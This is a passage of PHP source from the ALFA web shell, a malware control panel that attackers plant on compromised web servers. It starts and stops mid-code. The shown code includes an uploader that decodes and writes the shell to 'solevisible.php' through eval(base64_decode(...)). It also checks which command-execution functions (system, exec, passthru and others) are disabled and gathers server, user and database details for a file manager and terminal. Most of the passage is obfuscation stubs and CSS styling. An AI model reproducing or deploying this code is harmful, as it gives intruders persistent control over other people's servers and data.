IHRleHQtc2hhZG93OiA4cHggOHB4IDEzcHg7Ij48c3Ryb25nPjxiPjxiaWc+c29sZXZpc2libGVAZ21haWwuY29tPC9iPjwvYmlnPjwvc3Ryb25nPjwvc3Bhbj48L2NlbnRlcj4nOz8+';
$alfa_uploader = '$x = base64_decode("'.$GLOBALS['__ALFA_SHELL_CODE'].'");$solevisible = fopen("solevisible.php","w");fwrite($solevisible,$x);';
define("ALFA_UPLOADER", "eval(base64_decode('".__ZW5jb2Rlcg($alfa_uploader)."'))");
if(!isset($_POST['ajax'])){
function Alfa_GetDisable_Function(){
$disfun = @ini_get('disable_functions');
$afa = '<span class="header_show_all">All Functions Accessible</span>';
if(empty($disfun))return($afa);
$s = explode(',',$disfun);
$s = array_unique($s);
$i=0;
$b=0;
$func = array('system','exec','shell_exec','proc_open','popen','passthru','symlink','dl');
$black_list = array();
$allow_list = array();
foreach($s as $d){
$d=trim($d);
if(empty($d)||!is_callable($d))continue;
if(!function_exists($d)){
if(in_array($d,$func)){
$dis .= $d." | ";$b++;
$black_list[] = $d;
}else{
$allow_list[] = $d;
}
$i++;
}
}
if($i==0)return($afa);
if($i <= count($func)){
$all = array_values(array_merge($black_list, $allow_list));
return('<span class="disable_functions">'.implode(" | ", $all).'</span>');
}
return('<span class="disable_functions">'.$dis.'</span><a id="menu_opt_GetDisFunc" href=javascript:void(0) onclick="alfa_can_add_opt = true;g(\'GetDisFunc\',null,\'wp\');"><span class="header_show_all">Show All ('.$i.')</span></a>');
}
function AlfaNum(){
$args = func_get_args();
$alfax = array();
$find = array();
for($i=1;$i<=10;$i++){
$alfax[] = $i;
}
foreach($args as $arg){
$find[] = $arg;
}
echo '<script>';
foreach($alfax as $alfa){
if(in_array($alfa,$find))
continue;
echo 'alfa'.$alfa."_=";
}
echo '""</script>';
}
if(empty($_POST['charset']))
$_POST['charset'] = $GLOBALS['default_charset'];
$freeSpace = function_exists('diskfreespace')?@diskfreespace($GLOBALS['cwd']):'?';
$totalSpace = function_exists('disk_total_space')?@disk_total_space($GLOBALS['cwd']):'?';
$totalSpace = $totalSpace?$totalSpace:1;
$on="<span class='header_on'> ON </span>";
$of="<span class='header_off'> OFF </span>";
$none="<span class='header_none'> NONE </span>";
if(function_exists('ssh2_connect'))
$ssh2=$on;
else
$ssh2=$of;
if(function_exists('curl_version'))
$curl=$on;
else
$curl=$of;
if(function_exists('mysql_get_client_info')||class_exists('mysqli'))
$mysql=$on;
else
$mysql=$of;
if(function_exists('mssql_connect'))
$mssql=$on;
else
$mssql=$of;
if(function_exists('pg_connect'))
$pg=$on;
else
$pg=$of;
if(function_exists('oci_connect'))
$or=$on;
else
$or=$of;
if(@ini_get('disable_functions'))
$disfun=@ini_get('disable_functions');
else
$disfun="All Functions Enable";
if(@ini_get('safe_mode'))
$safe_modes="<span class='header_off'>ON</span>";
else
$safe_modes="<span class='header_on'>OFF</span>";
$cgi_shell="<span class='header_off' id='header_cgishell'>OFF</span>";
if(@ini_get('open_basedir')){
$basedir_data = @ini_get('open_basedir');
if(strlen($basedir_data)>120){
$open_b=substr($basedir_data,0, 120)."...";
}else{
$open_b = $basedir_data;
}
}else{$open_b=$none;}
if(@ini_get('safe_mode_exec_dir'))
$safe_exe=@ini_get('safe_mode_exec_dir');
else
$safe_exe=$none;
if(@ini_get('safe_mode_include_dir'))
$safe_include=@ini_get('safe_mode_include_dir');
else
$safe_include=$none;
if(!function_exists('posix_getegid'))
{
$user = function_exists("get_current_user")?@get_current_user():"????";
$uid = function_exists("getmyuid")?@getmyuid():"????";
$gid = function_exists("getmygid")?@getmygid():"????";
$group = "?";
}else{
$uid = function_exists("posix_getpwuid")&&function_exists("posix_geteuid")?@posix_getpwuid(posix_geteuid()):array("name"=>"????", "uid"=>"????");
$gid = function_exists("posix_getgrgid")&&function_exists("posix_getegid")?@posix_getgrgid(posix_getegid()):array("name"=>"????", "gid"=>"????");
$user = $uid['name'];
$uid = $uid['uid'];
$group = $gid['name'];
$gid = $gid['gid'];
}
$cwd_links = '';
$path = explode("/", $GLOBALS['cwd']);
$n=count($path);
for($i=0; $i<$n-1; $i++) {
$cwd_links .= "<a class='header_pwd' onclick='g(\"FilesMan\",\"";
$cach_cwd_path = "";
for($j=0; $j<=$i; $j++){
$cwd_links .= $path[$j].'/';
$cach_cwd_path .= $path[$j].'/';
}
$cwd_links .= "\")' path='".$cach_cwd_path."' href='#action=fileman&path=".$cach_cwd_path."'>".$path[$i]."/</a>";
}
$drives = "";
foreach(range('a','z') as $drive)
if(@is_dir($drive.':\\'))
$drives .= '<a href="javascript:void(0);" class="header_drive" onclick="g(\'FilesMan\',\''.$drive.':/\')">[ '.$drive.' ]</a> ';
$csscode ='-moz-animation-name: spin;-moz-animation-iteration-count: infinite;-moz-animation-timing-function: linear;-moz-animation-duration: 1s;-webkit-animation-name: spin;-webkit-animation-iteration-count: infinite;-webkit-animation-timing-function: linear;-webkit-animation-duration: 1s;-ms-animation-name: spin;-ms-animation-iteration-count: infinite;-ms-animation-timing-function: linear;-ms-animation-duration: 1s;animation-name: spin;animation-iteration-count: infinite;animation-timing-function: linear;animation-duration: 1s;';
echo '<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="ROBOTS" content="NOINDEX, NOFOLLOW" />
<link href="'.__showicon('alfamini').'" rel="icon" type="image/x-icon"/>
<title>'.__ALFA_CODE_NAME__.'-'.$_SERVER['HTTP_HOST'].'</title>
<style type="text/css">';?>
.hlabale{color:#67abdf;border-radius:4px;border:1px solid #27979b;margin-left:7px;padding:2px}#tbl_sympphp tr{text-align:center}#PhpCode,.php-evals-ace,.view_ml_content{position:absolute;top:0;right:0;bottom:0;left:0;background:#1b292b26;top:50px}.editor-view{position:relative;height:100%}.view-content{position:absolute;overflow-y:auto;width:100%;height:93%}::-webkit-scrollbar-track{-webkit-box-shadow:inset 0 0 6px rgba(0,0,0,.3);border-radius:10px;background-color:#000115}::-webkit-scrollbar{width:10px;background-color:#000115}::-webkit-scrollbar-thumb{border-radius:10px;-webkit-box-shadow:inset 0 0 6px rgba(0,0,0,.3);background-color:#1e82b5}.editor-file-name{margin-left:29px;margin-top:4px;overflow:hidden;text-overflow:ellipsis;white-space:nowrap}.editor-icon{position:absolute}.is_active{background:rgba(49,55,93,.77);border-radius:10px}.history-list{height:88%;overflow-y:auto}.opt-title{position:absolute;left:50%;top:50%;transform:translate(-50%,-50%);color:#2fd051;font-size:25px;font-family:monospace}.options_min_badge{visibility:hidden;text-align:center;right:30px;color:#fff;background:#2a8a24;padding:6px;border-radius:50%;width:15px;height:15px;display:inline-block;position:absolute;top:-7px}#cgiloader-minimized,#database_window-minimized,#editor-minimized,#options_window-minimized{display:block;position:fixed;right:-30px;width:30px;height:30px;top:30%;z-index:9999}.minimized-wrapper{position:relative;background:#0e304a;width:44px;height:130px;cursor:pointer;border-bottom-left-radius:5px;border-top-left-radius:5px}.minimized-text{transform:rotate(-90deg);color:wheat;font-size:x-large;display:inline-block;position:absolute;right:-51px;width:129px;top:-10px;border-top-left-radius:4%;height:56px;padding:3px}.close-button,.editor-minimize{height:26px;width:38px;right:7px;background:#1d5673;cursor:pointer;position:absolute;box-sizing:border-box;line-height:50px;display:inline-block;top:17px;border-radius:100px}.editor-minimize{right:50px}.close-button:after,.close-button:before,.editor-minimize:before{transform:rotate(-45deg);content:"";position:absolute;top:63%;right:6px;margin-top:-5px;margin-left:-25px;display:block;height:4px;width:27px;background-color:rgba(216,207,207,.75);transition:all .25s ease-out}.editor-minimize:before{transform:rotate(0)}.close-button:after{transform:rotate(-135deg)}.close-button:hover:after,.close-button:hover:before,.editor-minimize:hover:before{background-color:red}.close-button:hover,.editor-minimize:hover{background-color:rgba(39,66,80,.96)}#cgiloader,#database_window,#editor,#options_window{display:none;position:fixed;top:0;width:100%;height:100%;z-index:20}.editor-wrapper{width:100%;height:100%;position:relative;top:1%}.editor-header{width:97%;background:rgba(21,66,88,.93);height:37px;margin-left:13px;position:relative;border-top-left-radius:15px;border-top-right-radius:15px}.editor-path{position:absolute;font-size:x-large;margin-left:10px;top:6px;color:#00ff7f}.editor-modal{position:relative;top:0;background-color:rgba(0,1,23,.95);height:90%;margin-left:20%;margin-right:2%;border:2px #0e304a solid}.editor-explorer{width:19%;height:90%;background-color:rgba(0,1,23,.94);position:absolute;z-index:2;left:1%;border:2px #0e304a solid}.editor-controller{position:relative;top:-13px}.file-holder{position:relative;width:100%;height:30px}.file-holder>.history{position:absolute;color:#03b3a3;cursor:pointer;left:5px;font-size:18px;font-family:sans-serif;width:89%;height:100%;z-index:3;border-radius:10px;transition:background-color .6s ease-out}.file-holder>.history-close{display:block;opacity:0;position:absolute;right:2px;width:20px;top:4px;text-align:center;cursor:pointer;color:#fff;background:red;border-radius:100px;font-family:monospace;z-index:10;transition:opacity .6s ease-out;font-size:15px;height:19px}.file-holder>.history:hover{background-color:#646464}.editor-explorer>.hheader{position:relative;color:#14ff07;border-bottom:2px #206aa2 solid;text-align:center;font-family:sans-serif;margin-bottom:10px;height:55px}.editor-search{position:absolute;bottom:7px;left:31px}.hheader-text{position:absolute;left:8px;top:2px}.history-clear{position:absolute;right:8px;top:2px;cursor:pointer}.editor-body{position:relative;margin-left:3px;height:100%}.editor-anim-close{-webkit-animation:editorClose .8s ease-in-out forwards;-moz-animation:editorClose .8s ease-in-out forwards;-ms-animation:editorClose .8s ease-in-out forwards;animation:editorClose .8s ease-in-out forwards}@keyframes editorClose{0%{visibility:1;opacity:1}100%{visibility:0;opacity:0}}.editor-anim-minimize{-webkit-animation:editorMinimize .8s ease-in-out forwards;-moz-animation:editorMinimize .8s ease-in-out forwards;-ms-animation:editorMinimize .8s ease-in-out forwards;animation:editorMinimize .8s ease-in-out forwards}@keyframes editorMinimize{0%{right:0;opacity:1}100%{right:-2000px;opacity:0}}.editor-anim-show{-webkit-animation:editorShow .8s ease-in-out forwards;-moz-animation:editorShow .8s ease-in-out forwards;-ms-animation:editorShow .8s ease-in-out forwards;animation:editorShow .8s ease-in-out forwards}@keyframes editorShow{0%{right:-2000px;opacity:0}100%{right:0;opacity:1}}.minimized-show{-webkit-animation:minimizeShow .8s ease-in-out forwards;-moz-animation:minimizeShow .8s ease-in-out forwards;-ms-animation:minimizeShow .8s ease-in-out forwards;animation:minimizeShow .8s ease-in-out forwards}@keyframes minimizeShow{0%{right:-30px;opacity:0}100%{right:0;opacity:1}}.minimized-hide{-webkit-animation:minimizeHide .8s ease-in-out forwards;-moz-animation:minimizeHide .8s ease-in-out forwards;-ms-animation:minimizeHide .8s ease-in-out forwards;animation:minimizeHide .8s ease-in-out forwards}@keyframes minimizeHide{0%{right:0;opacity:1}100%{right:-30px;opacity:0}}.solevisible-text:hover{-webkit-text-shadow:0 0 25px #0f0;-moz-text-shadow:0 0 25px #0f0;-ms-text-shadow:0 0 25px #0f0;text-shadow:0 0 25px #0f0}.update-holder{position:fixed;top:0;background-color:rgba(0,24,29,.72);width:100%;height:100%}.update-content{position:relative}.update-content>a{text-decoration:none;position:absolute;color:rgba(103,167,47,.77);left:24%;margin-top:7%;font-size:40px}.update-close{position:absolute;right:0;margin-right:23px;top:10px;font-size:27px;background-color:#130f50;width:5%;border-radius:100px;cursor:pointer;border:2px #0e265a solid}.update-close:hover{border:2px #25ff00 solid;color:red}.filestools{height:auto;width:auto;color:#67abdf;font-size:12px;font-family:Verdana,Geneva,sans-serif}@-moz-document url-prefix(){#search-input{width:173px}.editor-path{top:3px}}.filters-holder{padding:5px;padding-left:10px}.filters-holder input{width:200px}.filters-holder span{color:#8bc7f7}#rightclick_menu{width:175px;visibility:hidden;opacity:0;position:fixed;background:#0f304a;color:#555;font-family:sans-serif;font-size:11px;-webkit-transition:opacity .5s ease-in-out;-moz-transition:opacity .5s ease-in-out;-ms-transition:opacity .5s ease-in-out;-o-transition:opacity .5s ease-in-out;transition:opacity .5s ease-in-out;-webkit-box-shadow:-1px 0 17px 0 #8b8b8c;-moz-box-shadow:-1px 0 17px 0 #8b8b8c;box-shadow:-1px 0 17px 0 #8b8b8c;padding:0;border:1px solid #737373;border-radius:10px}#rightclick_menu a{display:block;color:#fff;font-weight:bolder;text-decoration:none;padding:6px 8px 6px 30px;position:relative;padding-left:40px}#rightclick_menu a i.fa,#rightclick_menu a img{height:20px;font-size:17px;width:20px;position:absolute;left:5px;top:2px;padding-left:5px}#rightclick_menu a span{color:#bcb1b3;float:right}#rightclick_menu a:hover{color:#fff;background:#3879d9}#rightclick_menu hr{border:1px solid #ebebeb;border-bottom:0}.cl-popup-fixed{position:fixed;top:0;left:0;width:100%;height:100%;background:#201e1ead}#shortcutMenu-holder{position:absolute;top:40%;left:50%;transform:translate(-50%,-50%);background:#1f1e1edb;height:190px;width:500px;color:#fff}#shortcutMenu-holder>.popup-head{background:#207174;padding:6px;border-top:10px;text-align:center;font-family:sans-serif;color:#fff}#shortcutMenu-holder>form{padding:10px}#shortcutMenu-holder>form>label{display:block}#shortcutMenu-holder>form>input{width:99%;height:24px;margin-top:4px;color:#fff;outline:0;font-size:16px}#shortcutMenu-holder>.popup-foot{float:right;height:30px;margin-right:8px}#shortcutMenu-holder>.popup-foot>button{height:100%;cursor:pointer;color:#fff;outline:0}.php-terminal-output{overflow:auto;height:86%;border:1px solid #1e5673;border-radius:10px}.cmd-history-holder{visibility:hidden;opacity:0;position:absolute;color:#dff3d5;background:#093d58;top:-300px;height:300px;width:calc(69% + -11px);border-radius:10px 10px 0 0;left:calc(2% - 9px);transition:visibility .5s,opacity .5s linear}.cmd-history-holder .commands-history-header{background:#37504e;text-align:center;border-radius:10px 10px 0 0}.cmd-history-icon{width:27px;top:6px;left:calc(69% + 5px);position:absolute;cursor:pointer}.history-cmd-line{padding:4px;border-bottom:1px dashed;cursor:pointer}.history-cmd-line:hover{background:#961111}#myUL,#myUL ul{list-style-type:none}#myUL{margin:0;padding:0}.box{cursor:pointer;-webkit-user-select:none;-moz-user-select:none;-ms-user-select:none;user-select:none}.box::before{content:"\2610";color:#000;display:inline-block;margin-right:6px}.check-box::before{content:"\2611";color:#1e90ff}.nested{display:none}.active{display:block}.flag-holder>img{width:20px;vertical-align:middle;padding-left:6px}#options_window .content_options_holder .options_holder{position:relative;display:none;overflow:auto;min-height:300px;max-height:calc(100vh - 100px)}#options_window .content_options_holder .options_holder .header{min-height:50vh}#options_window .content_options_holder .options_holder.option_is_active{display:block}#options_window .content_options_holder .options_tab{padding:5px;margin-left:14px;margin-right:30px;background:#000;border-bottom:7px solid #0f304a;border-left:7px solid #0f304a;border-right:7px solid #0f304a;overflow-x:auto;white-space:nowrap}#filesman_tabs .filesman_tab img,#options_window .content_options_holder .options_tab .tab_name img,.editor-tab-name img,.sql-tabs .sql-tabname img,.terminal-tabs .terminal-tab img{width:10px;vertical-align:middle;margin-left:5px}#filesman_tabs .filesman_tab,#options_window .content_options_holder .options_tab .tab_name,.editor-tab-name,.sql-tabs .sql-newtab,.sql-tabs .sql-tabname,.terminal-tabs .terminal-tab{display:inline-block;background-color:#133d51;border-radius:4px;padding:5px;color:#fff;margin-right:3px;padding:5px;cursor:pointer;margin-bottom:1px;transition:background-color .5s}#filesman_tabs .filesman_tab{min-width:55px;text-align:center}#filesman_tabs .filesman_tab:hover,#options_window .content_options_holder .options_tab .tab_name:hover,.editor-tab-name:hover,.sql-tabs .sql-tabname:hover,.terminal-tabs .terminal-tab:hover{background-color:#a23939}.editor-tabs,.sql-tabs,.terminal-tabs{padding:5px;overflow-x:auto;white-space:nowrap}.options-loader-holder{position:absolute;top:0;left:0;width:100%;height:100%;background:#2b2626c7;z-index:11}.options-loader-holder img{position:absolute;top:32%;left:45%;transform:translate(-50%,-50%);width:100px;animation:spin 2s infinite}#filesman_tabs .filesman_tab.filesman-tab-active,#options_window .content_options_holder .options_tab .tab_name.tab_is_active,.editor-tab-name.editor-tab-active,.sql-tabname.sql-active-tab,.terminal-tab.active-terminal-tab{background-color:#009688}.tab-is-done{animation:2s tab_change_color infinite step-end}.stopAjax{color:#fff;font-size:20px;display:inline-block;padding:10px;cursor:pointer}#a_loader{display:none;position:fixed;top:0;left:0;width:100%;height:100%;background:#2b2626c7;z-index:99}.fmanager-row>td{position:relative}.fmanager-row .symlink_path{position:fixed;max-width:100%;background-color:#0f304a;border-radius:10px;font-size:15px;padding:8px;color:#fdf4f4;border:1px solid #8a8a8a;z-index:1;pointer-events:none}.archive-icons{vertical-align:middle}.archive-type-dir{font-weight:bolder}.archive-type-file{font-weight:unset}.archive-name{cursor:pointer}.archive_dir_holder a{color:#0f0;font-weight:bolder;cursor:pointer}.archive_dir_holder a:hover{color:#fff}.editor-content{height:100%}.editor-content-holder{height:90%}.editor-contents{display:none;position:relative;height:100%}.editor-contents.editor-content-active{display:block}.history-panel-controller{position:absolute;color:#fff;padding:10px;z-index:1000;border-radius:10px;top:50%;left:19%;background-color:#009687;cursor:pointer}.sql-content{display:none;position:relative;min-height:300px}.sql-content.sql-active-content{display:block}.pages-holder{padding:7px}.pages-number{display:inline-block;margin-left:10px}.pages-holder .pages-number a.page-number{padding:5px;background:#0f304a;margin-right:8px;cursor:pointer;width:33px;display:inline-block;text-align:center;border-radius:5px;color:#fff;transition:background .5s}.active-page-number{background:#10925c!important}.pages-number a.page-number:hover{background:#8a8a8a}.terminal-content{height:100%}.terminal-content,.terminal-tab{display:none}.terminal-content.active-terminal-content{display:block;position:relative}.terminal-btn-fontctl{background:#009688;width:50px;color:#fff;font-weight:bolder;outline:0;cursor:pointer}.alert-area{max-height:100%;position:fixed;bottom:5px;left:20px;right:20px;z-index:9999}.alert-box{font-size:16px;color:#fff;background:rgba(0,0,0,.9);line-height:1.3em;padding:10px 15px;margin:5px 10px;position:relative;border-radius:5px;transition:opacity .5s ease-in;-webkit-animation:alert-shake .5s ease-in-out;animation:alert-shake .5s ease-in-out}.alert-content-title{font-weight:700}.alert-box.alert-success{background:rgba(56,127,56,.89)}.alert-error{background:rgba(191,54,54,.89)}.alert-box.hide{opacity:0}.alert-close{background:0 0;width:12px;height:12px;position:absolute;top:15px;right:15px}.alert-close:after,.alert-close:before{content:"";width:15px;border-top:solid 2px #fff;position:absolute;top:5px;right:-1px;display:block}.alert-close:before{transform:rotate(45deg)}.alert-close:after{transform:rotate(135deg)}.alert-close:hover:after,.alert-close:hover:before{border-top:solid 2px #d8d8d8}@media (max-width:767px) and (min-width:481px){.alert-area{left:100px;right:100px}}@media (min-width:768px){.alert-area{width:350px;left:auto;right:0;z-index:9999}}@keyframes tab_change_color{0%{background-color:#133d51}50%{background-color:green}}@-webkit-keyframes alert-shake{0%{-webkit-transform:translateX(0)}20%{-webkit-transform:translateX(-10px)}40%{-webkit-transform:translateX(10px)}60%{-webkit-transform:translateX(-10px)}80%{-webkit-transform:translateX(10px)}100%{-webkit-transform:translateX(0)}}@keyframes alert-shake{0%{transform:translateX(0)}20%{transform:translateX(-10px)}40%{transform:translateX(10px)}60%{transform:translateX(-10px)}80%{transform:translateX(10px)}100%{transform:translateX(0)}}.textEffect{position:absolute;width:500px;top:-10px;animation:alert-shake .5s ease-in-out;animation-iteration-count:2}.alfateam-loader-text{position:absolute;color:#46bb45;top:23%;left:49%;transform:translate(-50%,-50%);font-size:40px;letter-spacing:7px}.alfa-ajax-error{position:absolute;color:#ff0a0a;top:50%;left:50%;transform:translate(-50%,-50%);font-size:30px}.connection-hist-table{margin-left:auto;margin-right:auto;text-align:justify;border-collapse:collapse}.connection-hist-table td,.connection-hist-table th{border:1px solid #ddd;text-align:left;padding:8px}.connection-his-btn{margin-bottom:10px;padding:5px;background:#206920;color:#fff;border:none;outline:0;cursor:pointer;font-weight:700;transition:background .3s}.connection-his-btn.connection-delete{margin:unset;padding:5px;background:red;width:33px;border-radius:3px;transition:background .3s}.connection-delete:hover{background:#f56969!important}.connection-his-btn:hover{background:#30b330}#up_bar_holder{position:fixed;z-index:100000;width:100%}#filesman_tabs{padding:8px;border:1px solid #0e304a;color:#67abdf;overflow-x:auto;white-space:nowrap}.sortable-ghost{opacity:.5;background:#c8ebfb}.folder-tab-icon{width:16px!important}#filesman-tab-full-path{display:none;position:absolute;pointer-events:none;background:#163746;padding:7px;color:#0f0;border-radius:10px;min-width:58px;z-index:10}#filesman-tab-full-path::after{content:"";position:absolute;top:100%;left:35px;margin-left:-5px;border-width:5px;border-style:solid;pointer-events:none;border-color:#163746 transparent transparent transparent}.mysql-main{height:84vh;position:relative}.mysql-hide-content{display:none}.mysql-query-result-tabs{margin-bottom:10px;padding:3px;border-bottom:4px solid #0f304a}.mysql-main .tables-panel-ctl{position:absolute;color:#fff;padding:10px;z-index:1;border-radius:10px;top:45%;left:calc(17% + 10px);background-color:#009687;cursor:pointer}.tables-panel-ctl-min{left:-21px!important}.mysql-query-result-tabs div{display:inline-block;padding:5px;margin-right:2px;background:#133d51;color:#fff;cursor:pointer;transition:background-color .5s}.mysql-query-result-tabs div:hover{background-color:#a23939}.mysql-query-result-tabs div.mysql-query-selected-tab{background:red}table tr.tbl_row:nth-child(odd){background:#424040}.mysql-tables .tables-row{margin-left:26px}.mysql-main .mysql-query-results,.mysql-main .mysql-tables{float:left;height:100%;overflow:auto}.mysql-main .mysql-query-results{width:calc(80% + 4px);margin-left:5px;position:relative;overflow:unset}.mysql-main .mysql-query-results-fixed{width:100%}.mysql-main .mysql-query-results .mysql-query-content{height:89%;overflow:auto}.mysql-query-tab-hide{height:0!important;padding:0!important}.mysql-main .mysql-tables{width:19%;border-right:4px solid #0e304a}.mysql-main table td{vertical-align:top}.mysql-main .mysql-search-area table td{vertical-align:middle;padding:7px}.mysql-tables .block{position:relative;width:1.5em;height:1.5em;min-width:16px;min-height:16px;float:left}.mysql-tables div.block b,.mysql-tables div.block i{width:1.5em;height:1.7em;min-width:16px;min-height:8px;position:absolute;bottom:.7em;left:.75em;z-index:0}.mysql-tables .block i{display:block;border-left:1px solid #666;border-bottom:1px solid #666;position:relative;z-index:0}.mysql-tables .block b{display:block;height:.75em;bottom:0;left:.75em;border-left:1px solid #666}.mysql-tables div.block a,.mysql-tables div.block u{position:absolute;left:50%;top:50%;z-index:10}.mysql-tables div.block img{position:relative;top:-.6em;left:0;margin-left:-7px}.mysql-tables .clearfloat{clear:both}.mysql-tables ul{list-style-type:none;margin-left:0;padding:0}.mysql-tables ul li{white-space:nowrap;clear:both;min-height:16px}.mysql-tables .db_name{margin-left:10px}.mysql-tables .list_container{border-left:1px solid #666;margin-left:.75em;padding-left:.75em}.hide-db-tables{display:none}.mysql-main:after{content:"";display:table;clear:both}table.mysql-data-tbl{border:none!important;border-collapse:collapse!important}table.mysql-data-tbl tr th{padding:5px}table.mysql-data-tbl td{border-left:3px solid #305a8d;border-right:3px solid #305a8d;padding:6px}table.mysql-data-tbl td:first-child{border-left:none}table.mysql-data-tbl td:last-child{border-right:none}.mysql-insert-result,.mysql-structure-qres,.mysql-update-result{display:none;text-align:center;padding:10px;border:1px dashed;margin:22px}#alfa-copyright{margin-top:15px}.ic_b_plus{background-image:url(http://solevisible.com/icons/menu/b_plus.png)}.ic_b_minus{background-image:url(http://solevisible.com/icons/menu/b_minus.png)}
<?php echo '
@keyframes spin {from {transform: rotate(0deg);}to{transform: rotate(360deg);}}
@-webkit-keyframes spin {from {-webkit-transform: rotate(0deg);}to {-webkit-transform: rotate(360deg);}}
@-moz-keyframes spin {from {-moz-transform: rotate(0deg);}to {-moz-transform: rotate(360deg);}}
@-ms-keyframes spin {from {-ms-transform: rotate(0deg);}to {-ms-transform: rotate(360deg);}}
#alfaloader{'.$csscode.'width:100px;height:100px;}
#a_loader img{'.$csscode.'width:150px;height:150px;position:fixed;z-index:999999;top: 31%;left: 45%;}
.ajaxarea{display:none;border:1px solid #0E304A;color:#67ABDF}.up_bar{margin-bottom: 2px;transition:width 2s;background-color:red;width:0;height:8px;display:none;}#hidden_sh{background-color:#0E304A;text-align:center;position:absolute;right:0;left:90%;border-bottom-left-radius:2em}.alert_green{color:#0F0;font-family:"Comic Sans MS";font-size:small;text-decoration:none}.whole{background-color:#000;}.header{height:auto;width:auto;border:7px solid #0E304A;color:'.alfa_getColor("header_values").';font-size:12px;font-family:Verdana,Geneva,sans-serif}.header a{text-decoration:none;}.filestools a{color:#0F0;text-decoration:none}.filestools a:hover{color:#FFF;text-decoration:none;}span{font-weight:bolder;color:#FFF}.txtfont{font-family:"Comic Sans MS";font-size:small;color:#fff;display:inline-block}.txtfont_header{font-family:"Comic Sans MS";font-size:large;display:inline-block;color:#59cc33}.tbltxt{font-family:"Comic Sans MS";color:#fff;font-size:small;display:inline-block}input[type="file"]{display:none}.inputfile{border:1px solid #0E304A;background:transparent;box-shadow:0 0 4px #0E304A;border-radius:4px;height:20px;width:250px;text-overflow:ellipsis;white-space:nowrap;cursor:pointer;display:inline-block;overflow:hidden}.inputfile:hover{box-shadow:0 0 4px #27979B;border:1px solid #27979B;-webkit-border-radius:4px;-moz-border-radius:4px;border-radius:4px;-webkit-box-shadow:rgba(0,119,0) 0 0 4px;-moz-box-shadow:rgba(0,119,0) 0 0 4px}.inputfile span,.inputfile strong{padding:2px;padding-left:10px}.inputfile span{color:#25ff00;width:90px;min-height:2em;display:inline-block;text-overflow:ellipsis;white-space:nowrap;overflow:hidden;vertical-align:top;float:left}.inputfile strong{background-image:url('.__showicon('alfamini').');background-repeat:no-repeat;background-position:float;height:100%;width:109px;color:#fff;background-color:#0E304A;display:inline-block;float:right}.inputfile:focus strong,.inputfile.has-focus strong,.inputfile:hover strong{background-color:#46647A}.button{padding:3px}#addup,.button{outline:none;cursor:pointer;border:1px solid #0E304A;background:transparent;box-shadow:0 0 4px #0E304A;-webkit-border-radius:4px;-moz-border-radius:4px;border-radius:100px;-webkit-box-shadow:#555 0 0 4px;-moz-box-shadow:#555 0 0 4px;background-color:#000;color:green;border-radius:100px}#addup:hover,.button:hover{box-shadow:0 0 4px #27979B;border:1px solid #27979B;-webkit-border-radius:4px;-moz-border-radius:4px;border-radius:100px;-webkit-box-shadow:rgba(0,119,0) 0 0 4px;-moz-box-shadow:rgba(0,119,0) 0 0 4px}input[type=text]:disabled:hover{cursor:not-allowed}td{padding:'.($GLOBALS['DB_NAME']['show_icons']=='1'?'0':'1').'px}.myCheckbox{padding-left:2px}.myCheckbox label{display:inline-block;cursor:pointer;position:relative}.myCheckbox input[type=checkbox]{display:none}.myCheckbox label:before{content:"";display:inline-block;width:14px;height:13px;position:absolute;background-color:#aaa;box-shadow:inset 0 2px 3px 0 rgba(0,0,0,.3),0 1px 0 0 rgba(255,255,255,.8)}.myCheckbox label{margin-bottom:15px;padding-right:17px}.myCheckbox label:before{border-radius:100px}input[type=checkbox]:checked + label:before{content:"";background-color:#0E304A;background-image:url('.__showicon('alfamini').');background-repeat:no-repeat;background-position:50% 50%;background-size:14px 14px;box-shadow:0 0 4px #0F0}#meunlist{font-family:Verdana,Geneva,sans-serif;color:#FFF;width:auto;border-right-width:7px;border-left-width:7px;height:auto;font-size:12px;font-weight:700;border-top-width:0;border-color:#0E304A;border-style:solid}.whole #meunlist ul{text-align:center;margin:0;padding:5px 5px 5px 5px;}
.whole #meunlist li{display:inline;padding:0;}.whole #meunlist a{font-family:arial,sans-serif;font-size:14px;text-decoration:none;font-weight:700;clear:both;width:10px;padding:3px 15px}.foot{font-family:Verdana,Geneva,sans-serif;margin:0;padding:0;width:100%;text-align:center;font-size:12px;color:#0E304A;border-right-width:7px;border-left-width:7px;border-bottom-width:7px;border-bottom-style:solid;border-right-style:solid;border-right-style:solid;border-left-style:solid;border-color:#0E304A}#text{text-align:center}input[type=submit]{cursor:pointer;background-color:#000;color:#27979B;width:30px;height:30px;border:1px solid #27979B;border-radius:10px}textarea{padding:3px;color:#999;text-shadow:#777 0 0 3px;border:1px solid #0E304A;background:transparent;box-shadow:0 0 4px #0E304A;padding:3px;-webkit-border-radius:4px;-moz-border-radius:4px;border-radius:4px;-webkit-box-shadow:#555 0 0 4px;-moz-box-shadow:#555 0 0 4px}textarea:hover{color:#FFF;text-shadow:#060 0 0 6px;box-shadow:0 0 4px #27979B;border:1px solid #27979B;padding:3px;-webkit-border-radius:4px;-moz-border-radius:4px;border-radius:4px;-webkit-box-shadow:rgba(0,119,0) 0 0 4px;-moz-box-shadow:rgba(0,119,0) 0 0 4px}input[type=text],input[type=number],.alfa_custom_cmd_btn{padding:3px;color:#999;text-shadow:#777 0 0 3px;border:1px solid #0E304A;background:transparent;box-shadow:0 0 4px #0E304A;padding:3px;-webkit-border-radius:4px;-moz-border-radius:4px;border-radius:4px;-webkit-box-shadow:#555 0 0 4px;-moz-box-shadow:#555 0 0 4px}input[type=submit]:hover{color:#fff;text-shadow:#060 0 0 6px;box-shadow:0 0 4px #27979B;border:2px solid #27979B;-moz-border-radius:4px;border-radius:100px;-webkit-box-shadow:rgba(0,119,0) 0 0 4px;-moz-box-shadow:rgba(0,119,0) 0 0 4px}input[type=text]:hover{color:#FFF;text-shadow:#060 0 0 6px;box-shadow:0 0 4px #27979B;border:1px solid #27979B;padding:3px;-webkit-border-radius:4px;-moz-border-radius:4px;border-radius:4px;-webkit-box-shadow:rgba(0,119,0) 0 0 4px;-moz-box-shadow:rgba(0,119,0) 0 0 4px}select{padding:3px;width:162px;color:#FFE;text-shadow:#000 0 2px 7px;border:1px solid #0E304A;background:#000;text-decoration:none;box-shadow:0 0 4px #0E304A;padding:3px;-webkit-border-radius:4px;-moz-border-radius:4px;border-radius:4px;-webkit-box-shadow:#555 0 0 